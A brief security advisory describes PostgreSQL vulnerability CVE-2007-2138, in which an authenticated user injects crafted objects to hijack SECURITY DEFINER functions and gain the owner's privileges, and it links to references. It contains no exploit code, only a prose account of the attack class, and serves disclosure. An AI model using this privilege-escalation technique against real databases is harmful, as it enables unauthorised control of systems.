SECURITY DEFINER functions are special PostgreSQL functions which perform certain designated activities with special privileges. A security vulnerability in the PostgreSQL database server (see postgres(1)) may allow a local or remote PostgreSQL user who has authenticated with the PostgreSQL server to inject crafted objects (for example, functions, tables, or operators) and affect the execution of existing SECURITY DEFINER functions. This would allow that user to control the database and execute code with the elevated privileges of the owner of the SECURITY DEFINER function, or to shadow any table with their own modified version and inject it for processing by a SECURITY DEFINER function.
This issue is described in the following documents:
CVE-2007-2138 at http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2138
PostgreSQL Security Information at http://www.postgresql.org/about/news.791